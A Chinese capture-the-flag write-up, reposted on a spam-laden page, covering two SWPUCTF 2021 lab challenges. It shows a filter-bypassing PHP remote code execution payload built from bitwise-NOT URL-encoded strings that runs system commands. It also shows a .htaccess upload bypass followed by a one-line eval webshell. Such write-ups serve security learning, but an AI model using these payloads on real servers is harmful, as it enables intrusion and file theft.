当前位置: 首页 > news >正文

2016年做网站能赚钱吗企业网站优化解决方案

2016年做网站能赚钱吗,企业网站优化解决方案,网络教学平台的功能,国内永久免费crm不实名认证[SWPUCTF 2021 新生赛]hardrce 1、题目 2、知识点 rce:远程代码执行、url取反编码 3、解题思路 打开题目 出现一段代码,审计源代码 题目需要我们通过get方式输入变量wllm的值 但是变量的值被过滤了,不能输入字母和\t、\n等值 所以我们需…

[SWPUCTF 2021 新生赛]hardrce

1、题目

2、知识点

rce:远程代码执行、url取反编码

3、解题思路

打开题目

出现一段代码,审计源代码

题目需要我们通过get方式输入变量wllm的值

但是变量的值被过滤了,不能输入字母和\t、\n等值

所以我们需要绕过这些过滤

源代码有eval函数,说明存在rce(远程代码执行漏洞),我们可以构造系统执行命令获取服务器的数据

eval()

通过查看wp,我们可以对输入的内容,先取反,再进行url编码,然后再进行取反传给服务器端

这里为什么要进行取反呢?

因为取反后再编码的数据不会被识别为字母,且没有那些被过滤的字符

~ 就是取反符号

例如

我们可以先构造phpinfo()尝试是否可以实现

执行php代码我是在网上找了一个在线工具,url如下

PHP 在线工具 | 菜鸟工具 (jyshare.com)

编码

<?php
echo urlencode(~'phpinfo');
?>

将编码后的值再取反传给wllm

http://node5.anna.nssctf.cn:26911/?wllm=(~%8F%97%8F%96%91%99%90)();

结果正常执行,说明这种方式可以绕过。

接下来因为有eval函数,我们可以构造系统执行命令进行执行

<?php
echo urlencode(~'system');
echo "\n";
echo urlencode(~'ls /');
?>

php执行系统命令,需要使用好system这个函数

http://node5.anna.nssctf.cn:26911/?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

可以看到有flllllaaaaaaggggggg这个文件

使用cat命令

<?php
echo urlencode(~'system');
echo "\n";
echo urlencode(~'cat /flllllaaaaaaggggggg');
?>

http://node5.anna.nssctf.cn:26911/?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

得到flag NSSCTF{99f12d58-f315-4e8d-a69d-ba2572aaf510}


[SWPUCTF 2021 新生赛]easyupload3.0

1、题目

2、知识点

文件上传绕过,.htaccess文件的利用

3、解题思路

打开题目,是一道文件上传的题目,我们先上传一个文件,并抓包看看

是一个apache服务

尝试改后缀,发现绕过不了

这里使用了apache服务,可以采用.htaccess文件进行绕过

我们可以上传一个.htaccess文件,内容如下

<FilesMatch "abc.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

这段代码的作用是将abc.jpg文件当成php文件执行,abc.jpg是我们自己构造上传的,可以根据自己需要命令

将.htaccess文件上传后我们就上传abc.jpg文件,内容为一句话木马

<?php

@eval($_POST['cmd']);

?>

上传完成功后使用蚁剑进行连接

连接成功后可以看到服务器的文件,在html文件夹下可以看到flag.php文件,打开得到flag

NSSCTF{bf0e1c22-b359-4868-94bb-ccc79a7501bf}


这篇文章就先写到这里了,哪里不足的欢迎批评指正

http://www.mnyf.cn/news/47889.html

相关文章:

  • 网站建设和维护待遇app营销推广方案
  • 建e网全景站外seo推广
  • 上海优化价格seo是什么的
  • 建立各抗日党派什么的主张上海短视频seo优化网站
  • 怎么做新的网站对网络营销的认识
  • 南京网站设计建设网站服务器
  • 南昌媒体网站建设口碑推荐下载百度app并安装
  • 网站建设兼职在哪找2024年小学生简短小新闻
  • 学校网站集群建设做广告推广哪个平台好
  • 做网站前台和后台是什么seo关键词快速排名前三位
  • 温州大型网站建设百度推广方式有哪些
  • 如何自己做优惠卷网站百度中心
  • 专业做招聘的网站自助建站平台源码
  • 虚拟主机发布网站吗株洲seo
  • 网站备案中查询花西子网络营销策划方案
  • 公司牌子设计图微信小程序排名关键词优化
  • 唐山路南网站建设正规排名网站推广公司
  • 宁波网站制作 收费标准怎么样自己创建网站
  • 这么攻击网站百度收录排名查询
  • 做网站的会什么比百度好用的搜索引擎
  • 微信扫一扫抽红包在哪里做网站分销平台
  • 在线数据分析网站持啊传媒企业推广
  • 潍坊哪个网站建设公司好最新新闻热点事件2023
  • 宝鸡市做网站的公司有哪些网络销售技巧和话术
  • 深圳宝安做网站如何做网站推广的策略
  • 临沂网站建设电话智能识别图片
  • asp网站后台密码破解搜索广告是什么
  • 可以免费做网站吗百度竞价推广课程
  • 怎样做网站平台赚钱全网整合营销公司
  • 北京宏福建设有限公司网站软件定制开发公司